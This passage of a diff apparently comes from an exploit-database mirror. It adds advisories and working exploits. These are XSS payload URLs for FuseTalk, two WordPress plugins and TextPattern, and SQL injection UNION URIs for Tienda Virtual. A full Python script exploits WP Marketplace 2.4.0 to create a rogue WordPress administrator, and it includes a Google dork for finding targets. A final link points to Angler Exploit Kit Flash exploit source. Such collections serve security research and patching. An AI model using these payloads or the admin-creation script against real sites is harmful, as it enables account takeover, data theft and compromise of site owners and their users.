An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
FuseTalk Forums 3.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
|
11
platforms/php/webapps/36486.txt
Executable file
11
platforms/php/webapps/36486.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/51240/info
|
||||
|
||||
Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
|
||||
|
||||
http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
|
7
platforms/php/webapps/36487.txt
Executable file
7
platforms/php/webapps/36487.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51241/info
|
||||
|
||||
The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
|
9
platforms/php/webapps/36488.txt
Executable file
9
platforms/php/webapps/36488.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51244/info
|
||||
|
||||
WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
WHOIS 1.4.2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss]
|
25
platforms/php/webapps/36489.txt
Executable file
25
platforms/php/webapps/36489.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/51254/info
|
||||
|
||||
TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
TextPattern 4.4.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
POST /textpattern/setup/index.php HTTP/1.1
|
||||
|
||||
Host: A.B.C.D
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
|
||||
Gecko/20100101 Firefox/8.0.1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-us,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
||||
Proxy-Connection: keep-alive
|
||||
Referer: http://www.example.com/textpattern/setup/index.php
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 156
|
||||
|
||||
duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
|
||||
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
|
||||
Config
|
183
platforms/php/webapps/36490.py
Executable file
183
platforms/php/webapps/36490.py
Executable file
|
@ -0,0 +1,183 @@
|
|||
#!/usr/bin/python
|
||||
#
|
||||
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
|
||||
#
|
||||
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
|
||||
#
|
||||
# Exploit written by Claudio Viviani
|
||||
#
|
||||
#
|
||||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
|
||||
#
|
||||
# function ajaxinit(){
|
||||
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
|
||||
# if(function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'],$_POST);
|
||||
# else
|
||||
# echo __("function not defined!","wpmarketplace");
|
||||
# die();
|
||||
# }
|
||||
#}
|
||||
#
|
||||
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
|
||||
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
|
||||
#
|
||||
# if (function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'], $_POST);
|
||||
# else
|
||||
# ...
|
||||
# ...
|
||||
# ...
|
||||
#
|
||||
# $_POST data needs to be an array
|
||||
#
|
||||
#
|
||||
# The wordpress function wp_insert_user is perfect:
|
||||
#
|
||||
# http://codex.wordpress.org/Function_Reference/wp_insert_user
|
||||
#
|
||||
# Description
|
||||
#
|
||||
# Insert a user into the database.
|
||||
#
|
||||
# Usage
|
||||
#
|
||||
# <?php wp_insert_user( $userdata ); ?>
|
||||
#
|
||||
# Parameters
|
||||
#
|
||||
# $userdata
|
||||
# (mixed) (required) An array of user data, stdClass or WP_User object.
|
||||
# Default: None
|
||||
#
|
||||
#
|
||||
#
|
||||
# Evil POST Data (Add new Wordpress Administrator):
|
||||
#
|
||||
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
|
||||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of "wpmarketplace"
|
||||
#
|
||||
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
|
||||
#
|
||||
# Http connection
|
||||
import urllib, urllib2, socket
|
||||
#
|
||||
import sys
|
||||
# String manipulator
|
||||
import string, random
|
||||
# Args management
|
||||
import optparse
|
||||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
||||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---'
|
||||
___ ___ __ __ __
|
||||
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|
||||
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|
||||
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|: | | |__|
|
||||
|::.|:. |
|
||||
`--- ---'
|
||||
WP Marketplace
|
||||
R3m0t3 C0d3 Ex3cut10n
|
||||
(Add WP Admin)
|
||||
v2.4.0
|
||||
|
||||
Written by:
|
||||
|
||||
Claudio Viviani
|
||||
|
||||
http://www.homelab.it
|
||||
|
||||
info@homelab.it
|
||||
homelabit@protonmail.ch
|
||||
|
||||
https://www.facebook.com/homelabit
|
||||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
||||
# Check args
|
||||
if not options.target:
|
||||
print(banner)
|
||||
commandList.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
host = checkurl(options.target)
|
||||
timeout = options.timeout
|
||||
|
||||
print(banner)
|
||||
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
username = id_generator()
|
||||
pwd = id_generator()
|
||||
|
||||
body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
|
||||
'execute' : 'wp_insert_user',
|
||||
'user_login' : username,
|
||||
'user_pass' : pwd,
|
||||
'role' : 'administrator'})
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
|
||||
|
||||
print "[+] Tryng to connect to: "+host
|
||||
try:
|
||||
req = urllib2.Request(host+"/", body, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
html = response.read()
|
||||
|
||||
if html == "":
|
||||
print("[!] Account Added")
|
||||
print("[!] Location: "+host+"/wp-login.php")
|
||||
print("[!] Username: "+username)
|
||||
print("[!] Password: "+pwd)
|
||||
else:
|
||||
print("[X] Exploitation Failed :(")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
11
platforms/windows/remote/36491.txt
Executable file
11
platforms/windows/remote/36491.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
Source: https://github.com/SecurityObscurity/cve-2015-0313
|
||||
|
||||
PoC: http://www.exploit-db.com/sploits/36491.zip
|
||||
|
||||
Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
|
||||
|
||||
Reference:
|
||||
|
||||
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
|
||||
http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html
|
||||
https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
|
Loading…
Add table
Reference in a new issue